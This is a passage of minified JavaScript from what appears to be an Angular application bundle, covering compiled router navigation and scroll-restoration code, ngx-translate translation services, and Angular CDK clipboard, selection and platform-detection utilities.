gi(4008,false)}}(e),this.navigateByUrl(this.createUrlTree(e,i),i)}serializeUrl(e){return this.urlSerializer.serialize(e)}parseUrl(e){let i;try{i=this.urlSerializer.parse(e)}catch(n){i=this.malformedUriErrorHandler(n,this.urlSerializer,e)}return i}isActive(e,i){let n;if(n=!0===i?Object.assign({},phe):!1===i?Object.assign({},_he):i,pg(e))return oL(this.currentUrlTree,e,n);const r=this.parseUrl(e);return oL(this.currentUrlTree,r,n)}removeEmptyProps(e){return Object.keys(e).reduce((i,n)=>{const r=e[n];return null!=r&&(i[n]=r),i},{})}processNavigations(){this.navigations.subscribe(e=>{var i;this.navigated=!0,this.lastSuccessfulId=e.id,this.currentPageId=e.targetPageId,this.events.next(new Ph(e.id,this.serializeUrl(e.extractedUrl),this.serializeUrl(this.currentUrlTree))),this.lastSuccessfulNavigation=this.currentNavigation,null===(i=this.titleStrategy)||void 0===i||i.updateTitle(this.routerState.snapshot),e.resolve(!0)},e=>{this.console.warn(`Unhandled Navigation Error: ${e}`)})}scheduleNavigation(e,i,n,r,c){var d,T;if(this.disposed)return Promise.resolve(!1);let k,q,Y;c?(k=c.resolve,q=c.reject,Y=c.promise):Y=new Promise((Re,Fe)=>{k=Re,q=Fe});const te=++this.navigationId;let pe;return"computed"===this.canceledNavigationResolution?(0===this.currentPageId&&(n=this.location.getState()),pe=n&&n.\u0275routerPageId?n.\u0275routerPageId:r.replaceUrl||r.skipLocationChange?null!==(d=this.browserPageId)&&void 0!==d?d:0:(null!==(T=this.browserPageId)&&void 0!==T?T:0)+1):pe=0,this.setTransition({id:te,targetPageId:pe,source:i,restoredState:n,currentUrlTree:this.currentUrlTree,currentRawUrl:this.rawUrlTree,rawUrl:e,extras:r,resolve:k,reject:q,promise:Y,currentSnapshot:this.routerState.snapshot,currentRouterState:this.routerState}),Y.catch(Re=>Promise.reject(Re))}setBrowserUrl(e,i){const n=this.urlSerializer.serialize(e),r=Object.assign(Object.assign({},i.extras.state),this.generateNgRouterState(i.id,i.targetPageId));this.location.isCurrentPathEqualTo(n)||i.extras.replaceUrl?this.location.replaceState(n,"",r):this.location.go(n,"",r)}restoreHistory(e,i=!1){var n,r;if("computed"===this.canceledNavigationResolution){const c=this.currentPageId-e.targetPageId;"popstate"!==e.source&&"eager"!==this.urlUpdateStrategy&&this.currentUrlTree!==(null===(n=this.currentNavigation)||void 0===n?void 0:n.finalUrl)||0===c?this.currentUrlTree===(null===(r=this.currentNavigation)||void 0===r?void 0:r.finalUrl)&&0===c&&(this.resetState(e),this.browserUrlTree=e.currentUrlTree,this.resetUrlToCurrentUrlTree()):this.location.historyGo(c)}else"replace"===this.canceledNavigationResolution&&(i&&this.resetState(e),this.resetUrlToCurrentUrlTree())}resetState(e){this.routerState=e.currentRouterState,this.currentUrlTree=e.currentUrlTree,this.rawUrlTree=this.urlHandlingStrategy.merge(this.currentUrlTree,e.rawUrl)}resetUrlToCurrentUrlTree(){this.location.replaceState(this.urlSerializer.serialize(this.rawUrlTree),"",this.generateNgRouterState(this.lastSuccessfulId,this.currentPageId))}cancelNavigationTransition(e,i,n){const r=new X4(e.id,this.serializeUrl(e.extractedUrl),i,n);this.triggerEvent(r),e.resolve(!1)}generateNgRouterState(e,i){return"computed"===this.canceledNavigationResolution?{navigationId:e,\u0275routerPageId:i}:{navigationId:e}}}return t.\u0275fac=function(e){_d()},t.\u0275prov=hi({token:t,factory:function(){return XL()},providedIn:"root"}),t})();function YL(t){return"imperative"!==t}let x1=(()=>{class t{constructor(e,i,n,r,c){this.router=e,this.route=i,this.tabIndexAttribute=n,this.renderer=r,this.el=c,this._preserveFragment=!1,this._skipLocationChange=!1,this._replaceUrl=!1,this.commands=null,this.onChanges=new J,this.setTabIndexIfNotOnNativeEl("0")}set preserveFragment(e){this._preserveFragment=Eh(e)}get preserveFragment(){return this._preserveFragment}set skipLocationChange(e){this._skipLocationChange=Eh(e)}get skipLocationChange(){return this._skipLocationChange}set replaceUrl(e){this._replaceUrl=Eh(e)}get replaceUrl(){return this._replaceUrl}setTabIndexIfNotOnNativeEl(e){if(null!=this.tabIndexAttribute)return;const i=this.renderer,n=this.el.nativeElement;null!==e?i.setAttribute(n,"tabindex",e):i.removeAttribute(n,"tabindex")}ngOnChanges(e){this.onChanges.next(this)}set routerLink(e){null!=e?(this.commands=Array.isArray(e)?e:[e],this.setTabIndexIfNotOnNativeEl("0")):(this.commands=null,this.setTabIndexIfNotOnNativeEl(null))}onClick(){return null===this.urlTree||this.router.navigateByUrl(this.urlTree,{skipLocationChange:this.skipLocationChange,replaceUrl:this.replaceUrl,state:this.state}),!0}get urlTree(){return null===this.commands?null:this.router.createUrlTree(this.commands,{relativeTo:void 0!==this.relativeTo?this.relativeTo:this.route,queryParams:this.queryParams,fragment:this.fragment,queryParamsHandling:this.queryParamsHandling,preserveFragment:this.preserveFragment})}}return t.\u0275fac=function(e){return new(e||t)(Ee(Oo),Ee(Tl),Vr("tabindex"),Ee(wr),Ee(mi))},t.\u0275dir=Ot({type:t,selectors:[["","routerLink","",5,"a",5,"area"]],hostBindings:function(e,i){1&e&&he("click",function(){return i.onClick()})},inputs:{queryParams:"queryParams",fragment:"fragment",queryParamsHandling:"queryParamsHandling",state:"state",relativeTo:"relativeTo",preserveFragment:"preserveFragment",skipLocationChange:"skipLocationChange",replaceUrl:"replaceUrl",routerLink:"routerLink"},standalone:!0,features:[sa]}),t})();class JL{}let Mhe=(()=>{class t{constructor(e,i,n,r,c){this.router=e,this.injector=n,this.preloadingStrategy=r,this.loader=c}setUpPreloading(){this.subscription=this.router.events.pipe(Dn(e=>e instanceof Ph),Rh(()=>this.preload())).subscribe(()=>{})}preload(){return this.processRoutes(this.injector,this.router.config)}ngOnDestroy(){this.subscription&&this.subscription.unsubscribe()}processRoutes(e,i){var n,r,c;const d=[];for(const T of i){T.providers&&!T._injector&&(T._injector=Sv(T.providers,e,`Route: ${T.path}`));const k=null!==(n=T._injector)&&void 0!==n?n:e,q=null!==(r=T._loadedInjector)&&void 0!==r?r:k;T.loadChildren&&!T._loadedRoutes&&void 0===T.canLoad||T.loadComponent&&!T._loadedComponent?d.push(this.preloadConfig(k,T)):(T.children||T._loadedRoutes)&&d.push(this.processRoutes(q,null!==(c=T.children)&&void 0!==c?c:T._loadedRoutes))}return Sa(d).pipe(Yt())}preloadConfig(e,i){return this.preloadingStrategy.preload(i,()=>{let n;n=i.loadChildren&&void 0===i.canLoad?this.loader.loadChildren(e,i):Bi(null);const r=n.pipe(Ut(c=>{var d;return null===c?Bi(void 0):(i._loadedRoutes=c.routes,i._loadedInjector=c.injector,this.processRoutes(null!==(d=c.injector)&&void 0!==d?d:e,c.routes))}));return i.loadComponent&&!i._loadedComponent?Sa([r,this.loader.loadComponent(i)]).pipe(Yt()):r})}}return t.\u0275fac=function(e){return new(e||t)(At(Oo),At(WD),At(Ht),At(JL),At(qx))},t.\u0275prov=hi({token:t,factory:t.\u0275fac,providedIn:"root"}),t})();const jx=new ni("");let ZL=(()=>{class t{constructor(e,i,n={}){this.router=e,this.viewportScroller=i,this.options=n,this.lastId=0,this.lastSource="imperative",this.restoredId=0,this.store={},n.scrollPositionRestoration=n.scrollPositionRestoration||"disabled",n.anchorScrolling=n.anchorScrolling||"disabled"}init(){"disabled"!==this.options.scrollPositionRestoration&&this.viewportScroller.setHistoryScrollRestoration("manual"),this.routerEventsSubscription=this.createScrollEvents(),this.scrollEventsSubscription=this.consumeScrollEvents()}createScrollEvents(){return this.router.events.subscribe(e=>{e instanceof Ey?(this.store[this.lastId]=this.viewportScroller.getScrollPosition(),this.lastSource=e.navigationTrigger,this.restoredId=e.restoredState?e.restoredState.navigationId:0):e instanceof Ph&&(this.lastId=e.id,this.scheduleScrollEvent(e,this.router.parseUrl(e.urlAfterRedirects).fragment))})}consumeScrollEvents(){return this.router.events.subscribe(e=>{e instanceof bL&&(e.position?"top"===this.options.scrollPositionRestoration?this.viewportScroller.scrollToPosition([0,0]):"enabled"===this.options.scrollPositionRestoration&&this.viewportScroller.scrollToPosition(e.position):e.anchor&&"enabled"===this.options.anchorScrolling?this.viewportScroller.scrollToAnchor(e.anchor):"disabled"!==this.options.scrollPositionRestoration&&this.viewportScroller.scrollToPosition([0,0]))})}scheduleScrollEvent(e,i){this.router.triggerEvent(new bL(e,"popstate"===this.lastSource?this.store[this.restoredId]:null,i))}ngOnDestroy(){this.routerEventsSubscription&&this.routerEventsSubscription.unsubscribe(),this.scrollEventsSubscription&&this.scrollEventsSubscription.unsubscribe()}}return t.\u0275fac=function(e){_d()},t.\u0275prov=hi({token:t,factory:t.\u0275fac}),t})();function w1(t,a){return{\u0275kind:t,\u0275providers:a}}function Qx(t){return[{provide:Ux,multi:!0,useValue:t}]}function tz(){const t=Po(Ko);return a=>{var e,i;const n=t.get(Yf);if(a!==n.components[0])return;const r=t.get(Oo),c=t.get(iz);1===t.get($x)&&r.initialNavigation(),null===(e=t.get(az,null,Da.Optional))||void 0===e||e.setUpPreloading(),null===(i=t.get(jx,null,Da.Optional))||void 0===i||i.init(),r.resetRootComponentType(n.componentTypes[0]),c.next(),c.complete()}}const iz=new ni("",{factory:()=>new J}),$x=new ni("",{providedIn:"root",factory:()=>1});const az=new ni("");function Ehe(t){return w1(0,[{provide:az,useExisting:Mhe},{provide:JL,useExisting:t}])}const nz=new ni("ROUTER_FORROOT_GUARD"),Dhe=[iy,{provide:lL,useClass:Ax},{provide:Oo,useFactory:XL},xy,{provide:Tl,useFactory:function ez(t){return t.routerState.root},deps:[Oo]},qx];function xhe(){return new S9("Router",Oo)}let Ms=(()=>{class t{constructor(e){}static forRoot(e,i){return{ngModule:t,providers:[Dhe,[],Qx(e),{provide:nz,useFactory:She,deps:[[Oo,new Cc,new Vc]]},{provide:s3,useValue:i||{}},null!=i&&i.useHash?{provide:tg,useClass:qoe}:{provide:tg,useClass:iP},{provide:jx,useFactory:()=>{const t=Po(Oo),a=Po(tse),e=Po(s3);return e.scrollOffset&&a.setOffset(e.scrollOffset),new ZL(t,a,e)}},null!=i&&i.preloadingStrategy?Ehe(i.preloadingStrategy).\u0275providers:[],{provide:S9,multi:!0,useFactory:xhe},null!=i&&i.initialNavigation?khe(i):[],[{provide:oz,useFactory:tz},{provide:T9,multi:!0,useExisting:oz}]]}}static forChild(e){return{ngModule:t,providers:[Qx(e)]}}}return t.\u0275fac=function(e){return new(e||t)(At(nz,8))},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[Lx]}),t})();function She(t){return"guarded"}function khe(t){return["disabled"===t.initialNavigation?w1(3,[{provide:Nv,multi:!0,useFactory:()=>{const a=Po(Oo);return()=>{a.setUpLocationChangeListener()}}},{provide:$x,useValue:2}]).\u0275providers:[],"enabledBlocking"===t.initialNavigation?w1(2,[{provide:$x,useValue:0},{provide:Nv,multi:!0,deps:[Ko],useFactory:a=>{const e=a.get(Hoe,Promise.resolve());let i=!1;return()=>e.then(()=>new Promise(r=>{const c=a.get(Oo),d=a.get(iz);(function n(r){a.get(Oo).events.pipe(Dn(d=>d instanceof Ph||d instanceof X4||d instanceof yL),Xe(d=>d instanceof Ph||d instanceof X4&&(0===d.code||1===d.code)&&null),Dn(d=>null!==d),Cn(1)).subscribe(()=>{r()})})(()=>{r(!0),i=!0}),c.afterPreactivation=()=>(r(!0),i||d.closed?Bi(void 0):d),c.initialNavigation()}))}}]).\u0275providers:[]]}const oz=new ni("");function Cm(t){return!!t&&(t instanceof G||ie(t.lift)&&ie(t.subscribe))}const Kx={now:()=>(Kx.delegate||Date).now(),delegate:void 0};class Ohe extends J{constructor(a=1/0,e=1/0,i=Kx){super(),this._bufferSize=a,this._windowTime=e,this._timestampProvider=i,this._buffer=[],this._infiniteTimeWindow=!0,this._infiniteTimeWindow=e===1/0,this._bufferSize=Math.max(1,a),this._windowTime=Math.max(1,e)}next(a){const{isStopped:e,_buffer:i,_infiniteTimeWindow:n,_timestampProvider:r,_windowTime:c}=this;e||(i.push(a),!n&&i.push(r.now()+c)),this._trimBuffer(),super.next(a)}_subscribe(a){this._throwIfClosed(),this._trimBuffer();const e=this._innerSubscribe(a),{_infiniteTimeWindow:i,_buffer:n}=this,r=n.slice();for(let c=0;c<r.length&&!a.closed;c+=i?1:2)a.next(r[c]);return this._checkFinalizedStatuses(a),e}_trimBuffer(){const{_bufferSize:a,_timestampProvider:e,_buffer:i,_infiniteTimeWindow:n}=this,r=(n?1:2)*a;if(a<1/0&&r<i.length&&i.splice(0,i.length-r),!n){const c=e.now();let d=0;for(let T=1;T<i.length&&i[T]<=c;T+=2)d=T;d&&i.splice(0,d+1)}}}function rz(t,a,e){let i,n=!1;return t&&"object"==typeof t?({bufferSize:i=1/0,windowTime:a=1/0,refCount:n=!1,scheduler:e}=t):i=null!=t?t:1/0,Bd({connector:()=>new Ohe(i,a,e),resetOnError:!0,resetOnComplete:!1,resetOnRefCountZero:n})}class Py{}let sz=(()=>{class t extends Py{getTranslation(e){return Bi({})}}return t.\u0275fac=function(){let a;return function(i){return(a||(a=ba(t)))(i||t)}}(),t.\u0275prov=hi({token:t,factory:t.\u0275fac}),t})();class Xx{}let cz=(()=>{class t{handle(e){return e.key}}return t.\u0275fac=function(e){return new(e||t)},t.\u0275prov=hi({token:t,factory:t.\u0275fac}),t})();function m3(t,a){if(t===a)return!0;if(null===t||null===a)return!1;if(t!=t&&a!=a)return!0;let n,r,c,e=typeof t;if(e==typeof a&&"object"==e){if(!Array.isArray(t)){if(Array.isArray(a))return!1;for(r in c=Object.create(null),t){if(!m3(t[r],a[r]))return!1;c[r]=!0}for(r in a)if(!(r in c)&&void 0!==a[r])return!1;return!0}if(!Array.isArray(a))return!1;if((n=t.length)==a.length){for(r=0;r<n;r++)if(!m3(t[r],a[r]))return!1;return!0}}return!1}function cp(t){return null!=t}function Yx(t){return t&&"object"==typeof t&&!Array.isArray(t)}function lz(t,a){let e=Object.assign({},t);return Yx(t)&&Yx(a)&&Object.keys(a).forEach(i=>{Yx(a[i])?i in t?e[i]=lz(t[i],a[i]):Object.assign(e,{[i]:a[i]}):Object.assign(e,{[i]:a[i]})}),e}class u3{}let dz=(()=>{class t extends u3{constructor(){super(...arguments),this.templateMatcher=/{{\s?([^{}\s]*)\s?}}/g}interpolate(e,i){let n;return n="string"==typeof e?this.interpolateString(e,i):"function"==typeof e?this.interpolateFunction(e,i):e,n}getValue(e,i){let n="string"==typeof i?i.split("."):[i];i="";do{i+=n.shift(),!cp(e)||!cp(e[i])||"object"!=typeof e[i]&&n.length?n.length?i+=".":e=void 0:(e=e[i],i="")}while(n.length);return e}interpolateFunction(e,i){return e(i)}interpolateString(e,i){return i?e.replace(this.templateMatcher,(n,r)=>{let c=this.getValue(i,r);return cp(c)?c:n}):e}}return t.\u0275fac=function(){let a;return function(i){return(a||(a=ba(t)))(i||t)}}(),t.\u0275prov=hi({token:t,factory:t.\u0275fac}),t})();class h3{}let mz=(()=>{class t extends h3{compile(e,i){return e}compileTranslations(e,i){return e}}return t.\u0275fac=function(){let a;return function(i){return(a||(a=ba(t)))(i||t)}}(),t.\u0275prov=hi({token:t,factory:t.\u0275fac}),t})();class uz{constructor(){this.currentLang=this.defaultLang,this.translations={},this.langs=[],this.onTranslationChange=new Tt,this.onLangChange=new Tt,this.onDefaultLangChange=new Tt}}const Jx=new ni("USE_STORE"),Zx=new ni("USE_DEFAULT_LANG"),ew=new ni("DEFAULT_LANGUAGE"),tw=new ni("USE_EXTEND");let Sn=(()=>{class t{constructor(e,i,n,r,c,d=!0,T=!1,k=!1,q){this.store=e,this.currentLoader=i,this.compiler=n,this.parser=r,this.missingTranslationHandler=c,this.useDefaultLang=d,this.isolate=T,this.extend=k,this.pending=!1,this._onTranslationChange=new Tt,this._onLangChange=new Tt,this._onDefaultLangChange=new Tt,this._langs=[],this._translations={},this._translationRequests={},q&&this.setDefaultLang(q)}get onTranslationChange(){return this.isolate?this._onTranslationChange:this.store.onTranslationChange}get onLangChange(){return this.isolate?this._onLangChange:this.store.onLangChange}get onDefaultLangChange(){return this.isolate?this._onDefaultLangChange:this.store.onDefaultLangChange}get defaultLang(){return this.isolate?this._defaultLang:this.store.defaultLang}set defaultLang(e){this.isolate?this._defaultLang=e:this.store.defaultLang=e}get currentLang(){return this.isolate?this._currentLang:this.store.currentLang}set currentLang(e){this.isolate?this._currentLang=e:this.store.currentLang=e}get langs(){return this.isolate?this._langs:this.store.langs}set langs(e){this.isolate?this._langs=e:this.store.langs=e}get translations(){return this.isolate?this._translations:this.store.translations}set translations(e){this.isolate?this._translations=e:this.store.translations=e}setDefaultLang(e){if(e===this.defaultLang)return;let i=this.retrieveTranslations(e);void 0!==i?(null==this.defaultLang&&(this.defaultLang=e),i.pipe(Cn(1)).subscribe(n=>{this.changeDefaultLang(e)})):this.changeDefaultLang(e)}getDefaultLang(){return this.defaultLang}use(e){if(e===this.currentLang)return Bi(this.translations[e]);let i=this.retrieveTranslations(e);return void 0!==i?(this.currentLang||(this.currentLang=e),i.pipe(Cn(1)).subscribe(n=>{this.changeLang(e)}),i):(this.changeLang(e),Bi(this.translations[e]))}retrieveTranslations(e){let i;return(void 0===this.translations[e]||this.extend)&&(this._translationRequests[e]=this._translationRequests[e]||this.getTranslation(e),i=this._translationRequests[e]),i}getTranslation(e){this.pending=!0;const i=this.currentLoader.getTranslation(e).pipe(rz(1),Cn(1));return this.loadingTranslations=i.pipe(Xe(n=>this.compiler.compileTranslations(n,e)),rz(1),Cn(1)),this.loadingTranslations.subscribe({next:n=>{this.translations[e]=this.extend&&this.translations[e]?Object.assign(Object.assign({},n),this.translations[e]):n,this.updateLangs(),this.pending=!1},error:n=>{this.pending=!1}}),i}setTranslation(e,i,n=!1){i=this.compiler.compileTranslations(i,e),this.translations[e]=(n||this.extend)&&this.translations[e]?lz(this.translations[e],i):i,this.updateLangs(),this.onTranslationChange.emit({lang:e,translations:this.translations[e]})}getLangs(){return this.langs}addLangs(e){e.forEach(i=>{-1===this.langs.indexOf(i)&&this.langs.push(i)})}updateLangs(){this.addLangs(Object.keys(this.translations))}getParsedResult(e,i,n){let r;if(i instanceof Array){let c={},d=!1;for(let T of i)c[T]=this.getParsedResult(e,T,n),Cm(c[T])&&(d=!0);return d?$6(i.map(k=>Cm(c[k])?c[k]:Bi(c[k]))).pipe(Xe(k=>{let q={};return k.forEach((Y,te)=>{q[i[te]]=Y}),q})):c}if(e&&(r=this.parser.interpolate(this.parser.getValue(e,i),n)),void 0===r&&null!=this.defaultLang&&this.defaultLang!==this.currentLang&&this.useDefaultLang&&(r=this.parser.interpolate(this.parser.getValue(this.translations[this.defaultLang],i),n)),void 0===r){let c={key:i,translateService:this};void 0!==n&&(c.interpolateParams=n),r=this.missingTranslationHandler.handle(c)}return void 0!==r?r:i}get(e,i){if(!cp(e)||!e.length)throw new Error('Parameter "key" required');if(this.pending)return this.loadingTranslations.pipe(Rh(n=>Cm(n=this.getParsedResult(n,e,i))?n:Bi(n)));{let n=this.getParsedResult(this.translations[this.currentLang],e,i);return Cm(n)?n:Bi(n)}}getStreamOnTranslationChange(e,i){if(!cp(e)||!e.length)throw new Error('Parameter "key" required');return ug(rp(()=>this.get(e,i)),this.onTranslationChange.pipe(Ur(n=>{const r=this.getParsedResult(n.translations,e,i);return"function"==typeof r.subscribe?r:Bi(r)})))}stream(e,i){if(!cp(e)||!e.length)throw new Error('Parameter "key" required');return ug(rp(()=>this.get(e,i)),this.onLangChange.pipe(Ur(n=>{const r=this.getParsedResult(n.translations,e,i);return Cm(r)?r:Bi(r)})))}instant(e,i){if(!cp(e)||!e.length)throw new Error('Parameter "key" required');let n=this.getParsedResult(this.translations[this.currentLang],e,i);if(Cm(n)){if(e instanceof Array){let r={};return e.forEach((c,d)=>{r[e[d]]=e[d]}),r}return e}return n}set(e,i,n=this.currentLang){this.translations[n][e]=this.compiler.compile(i,n),this.updateLangs(),this.onTranslationChange.emit({lang:n,translations:this.translations[n]})}changeLang(e){this.currentLang=e,this.onLangChange.emit({lang:e,translations:this.translations[e]}),null==this.defaultLang&&this.changeDefaultLang(e)}changeDefaultLang(e){this.defaultLang=e,this.onDefaultLangChange.emit({lang:e,translations:this.translations[e]})}reloadLang(e){return this.resetLang(e),this.getTranslation(e)}resetLang(e){this._translationRequests[e]=void 0,this.translations[e]=void 0}getBrowserLang(){if("undefined"==typeof window||void 0===window.navigator)return;let e=window.navigator.languages?window.navigator.languages[0]:null;return e=e||window.navigator.language||window.navigator.browserLanguage||window.navigator.userLanguage,void 0!==e?(-1!==e.indexOf("-")&&(e=e.split("-")[0]),-1!==e.indexOf("_")&&(e=e.split("_")[0]),e):void 0}getBrowserCultureLang(){if("undefined"==typeof window||void 0===window.navigator)return;let e=window.navigator.languages?window.navigator.languages[0]:null;return e=e||window.navigator.language||window.navigator.browserLanguage||window.navigator.userLanguage,e}}return t.\u0275fac=function(e){return new(e||t)(At(uz),At(Py),At(h3),At(u3),At(Xx),At(Zx),At(Jx),At(tw),At(ew))},t.\u0275prov=hi({token:t,factory:t.\u0275fac}),t})(),Xi=(()=>{class t{constructor(e,i){this.translate=e,this._ref=i,this.value="",this.lastKey=null,this.lastParams=[]}updateValue(e,i,n){let r=c=>{this.value=void 0!==c?c:e,this.lastKey=e,this._ref.markForCheck()};if(n){let c=this.translate.getParsedResult(n,e,i);Cm(c.subscribe)?c.subscribe(r):r(c)}this.translate.get(e,i).subscribe(r)}transform(e,...i){if(!e||!e.length)return e;if(m3(e,this.lastKey)&&m3(i,this.lastParams))return this.value;let n;if(cp(i[0])&&i.length)if("string"==typeof i[0]&&i[0].length){let r=i[0].replace(/(\')?([a-zA-Z0-9_]+)(\')?(\s)?:/g,'"$2":').replace(/:(\s)?(\')(.*?)(\')/g,':"$3"');try{n=JSON.parse(r)}catch(c){throw new SyntaxError(`Wrong parameter in TranslatePipe. Expected a valid Object, received: ${i[0]}`)}}else"object"==typeof i[0]&&!Array.isArray(i[0])&&(n=i[0]);return this.lastKey=e,this.lastParams=i,this.updateValue(e,n),this._dispose(),this.onTranslationChange||(this.onTranslationChange=this.translate.onTranslationChange.subscribe(r=>{this.lastKey&&r.lang===this.translate.currentLang&&(this.lastKey=null,this.updateValue(e,n,r.translations))})),this.onLangChange||(this.onLangChange=this.translate.onLangChange.subscribe(r=>{this.lastKey&&(this.lastKey=null,this.updateValue(e,n,r.translations))})),this.onDefaultLangChange||(this.onDefaultLangChange=this.translate.onDefaultLangChange.subscribe(()=>{this.lastKey&&(this.lastKey=null,this.updateValue(e,n))})),this.value}_dispose(){void 0!==this.onTranslationChange&&(this.onTranslationChange.unsubscribe(),this.onTranslationChange=void 0),void 0!==this.onLangChange&&(this.onLangChange.unsubscribe(),this.onLangChange=void 0),void 0!==this.onDefaultLangChange&&(this.onDefaultLangChange.unsubscribe(),this.onDefaultLangChange=void 0)}ngOnDestroy(){this._dispose()}}return t.\u0275fac=function(e){return new(e||t)(Ee(Sn,16),Ee(Ma,16))},t.\u0275pipe=Fr({name:"translate",type:t,pure:!1}),t.\u0275prov=hi({token:t,factory:t.\u0275fac}),t})(),iw=(()=>{class t{static forRoot(e={}){return{ngModule:t,providers:[e.loader||{provide:Py,useClass:sz},e.compiler||{provide:h3,useClass:mz},e.parser||{provide:u3,useClass:dz},e.missingTranslationHandler||{provide:Xx,useClass:cz},uz,{provide:Jx,useValue:e.isolate},{provide:Zx,useValue:e.useDefaultLang},{provide:tw,useValue:e.extend},{provide:ew,useValue:e.defaultLanguage},Sn]}}static forChild(e={}){return{ngModule:t,providers:[e.loader||{provide:Py,useClass:sz},e.compiler||{provide:h3,useClass:mz},e.parser||{provide:u3,useClass:dz},e.missingTranslationHandler||{provide:Xx,useClass:cz},{provide:Jx,useValue:e.isolate},{provide:Zx,useValue:e.useDefaultLang},{provide:tw,useValue:e.extend},{provide:ew,useValue:e.defaultLanguage},Sn]}}}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({}),t})();class Nhe{constructor(a,e){this._document=e;const i=this._textarea=this._document.createElement("textarea"),n=i.style;n.position="fixed",n.top=n.opacity="0",n.left="-999em",i.setAttribute("aria-hidden","true"),i.value=a,i.readOnly=!0,this._document.body.appendChild(i)}copy(){const a=this._textarea;let e=!1;try{if(a){const i=this._document.activeElement;a.select(),a.setSelectionRange(0,a.value.length),e=this._document.execCommand("copy"),i&&i.focus()}}catch(i){}return e}destroy(){const a=this._textarea;a&&(a.remove(),this._textarea=void 0)}}let hz=(()=>{class t{constructor(e){this._document=e}copy(e){const i=this.beginCopy(e),n=i.copy();return i.destroy(),n}beginCopy(e){return new Nhe(e,this._document)}}return t.\u0275fac=function(e){return new(e||t)(At(ga))},t.\u0275prov=hi({token:t,factory:t.\u0275fac,providedIn:"root"}),t})(),fz=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({}),t})();function wi(t){return null!=t&&"false"!=`${t}`}function Uo(t,a=0){return pz(t)?Number(t):a}function pz(t){return!isNaN(parseFloat(t))&&!isNaN(Number(t))}function Oy(t){return Array.isArray(t)?t:[t]}function vs(t){return null==t?"":"string"==typeof t?t:`${t}px`}function Gr(t){return t instanceof mi?t.nativeElement:t}class _z{}function f3(t){return t&&"function"==typeof t.connect&&!(t instanceof bx)}class gz{applyChanges(a,e,i,n,r){a.forEachOperation((c,d,T)=>{let k,q;if(null==c.previousIndex){const Y=i(c,d,T);k=e.createEmbeddedView(Y.templateRef,Y.context,Y.index),q=1}else null==T?(e.remove(d),q=3):(k=e.get(d),e.move(k,T),q=2);r&&r({context:null==k?void 0:k.context,operation:q,record:c})})}detach(){}}class I1{constructor(a=!1,e,i=!0,n){this._multiple=a,this._emitChanges=i,this.compareWith=n,this._selection=new Set,this._deselectedToEmit=[],this._selectedToEmit=[],this.changed=new J,e&&e.length&&(a?e.forEach(r=>this._markSelected(r)):this._markSelected(e[0]),this._selectedToEmit.length=0)}get selected(){return this._selected||(this._selected=Array.from(this._selection.values())),this._selected}select(...a){this._verifyValueAssignment(a),a.forEach(i=>this._markSelected(i));const e=this._hasQueuedChanges();return this._emitChangeEvent(),e}deselect(...a){this._verifyValueAssignment(a),a.forEach(i=>this._unmarkSelected(i));const e=this._hasQueuedChanges();return this._emitChangeEvent(),e}setSelection(...a){this._verifyValueAssignment(a);const e=this.selected,i=new Set(a);a.forEach(r=>this._markSelected(r)),e.filter(r=>!i.has(r)).forEach(r=>this._unmarkSelected(r));const n=this._hasQueuedChanges();return this._emitChangeEvent(),n}toggle(a){return this.isSelected(a)?this.deselect(a):this.select(a)}clear(a=!0){this._unmarkAll();const e=this._hasQueuedChanges();return a&&this._emitChangeEvent(),e}isSelected(a){if(this.compareWith){for(const e of this._selection)if(this.compareWith(e,a))return!0;return!1}return this._selection.has(a)}isEmpty(){return 0===this._selection.size}hasValue(){return!this.isEmpty()}sort(a){this._multiple&&this.selected&&this._selected.sort(a)}isMultipleSelection(){return this._multiple}_emitChangeEvent(){this._selected=null,(this._selectedToEmit.length||this._deselectedToEmit.length)&&(this.changed.next({source:this,added:this._selectedToEmit,removed:this._deselectedToEmit}),this._deselectedToEmit=[],this._selectedToEmit=[])}_markSelected(a){this.isSelected(a)||(this._multiple||this._unmarkAll(),this.isSelected(a)||this._selection.add(a),this._emitChanges&&this._selectedToEmit.push(a))}_unmarkSelected(a){this.isSelected(a)&&(this._selection.delete(a),this._emitChanges&&this._deselectedToEmit.push(a))}_unmarkAll(){this.isEmpty()||this._selection.forEach(a=>this._unmarkSelected(a))}_verifyValueAssignment(a){}_hasQueuedChanges(){return!(!this._deselectedToEmit.length&&!this._selectedToEmit.length)}}let aw=(()=>{class t{constructor(){this._listeners=[]}notify(e,i){for(let n of this._listeners)n(e,i)}listen(e){return this._listeners.push(e),()=>{this._listeners=this._listeners.filter(i=>e!==i)}}ngOnDestroy(){this._listeners=[]}}return t.\u0275fac=function(e){return new(e||t)},t.\u0275prov=hi({token:t,factory:t.\u0275fac,providedIn:"root"}),t})();const Ny=new ni("_ViewRepeater");function ea(t){return Ie((a,e)=>{pn(t).subscribe(Ae(e,()=>e.complete(),y)),!e.closed&&a.subscribe(e)})}const zhe=new ni("cdk-dir-doc",{providedIn:"root",factory:function Whe(){return Po(ga)}}),Fhe=/^(ar|ckb|dv|he|iw|fa|nqo|ps|sd|ug|ur|yi|.*[-_](Adlm|Arab|Hebr|Nkoo|Rohg|Thaa))(?!.*[-_](Latn|Cyrl)($|-|_))($|-|_)/i;let nw,Cr=(()=>{class t{constructor(e){if(this.value="ltr",this.change=new Tt,e){const n=e.documentElement?e.documentElement.dir:null;this.value=function Vhe(t){const a=(null==t?void 0:t.toLowerCase())||"";return"auto"===a&&"undefined"!=typeof navigator&&(null==navigator?void 0:navigator.language)?Fhe.test(navigator.language)?"rtl":"ltr":"rtl"===a?"rtl":"ltr"}((e.body?e.body.dir:null)||n||"ltr")}}ngOnDestroy(){this.change.complete()}}return t.\u0275fac=function(e){return new(e||t)(At(zhe,8))},t.\u0275prov=hi({token:t,factory:t.\u0275fac,providedIn:"root"}),t})(),R1=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({}),t})();try{nw="undefined"!=typeof Intl&&Intl.v8BreakIterator}catch(t){nw=!1}let S1,cr=(()=>{class t{constructor(e){this._platformId=e,this.isBrowser=this._platformId?ag(this._platformId):"object"==typeof document&&!!document,this.EDGE=this.isBrowser&&/(edge)/i.test(navigator.userAgent),this.TRIDENT=this.isBrowser&&/(msie|trident)/i.test(navigator.userAgent),this.BLINK=this.isBrowser&&!(!window.chrome&&!nw)&&"undefined"!=typeof 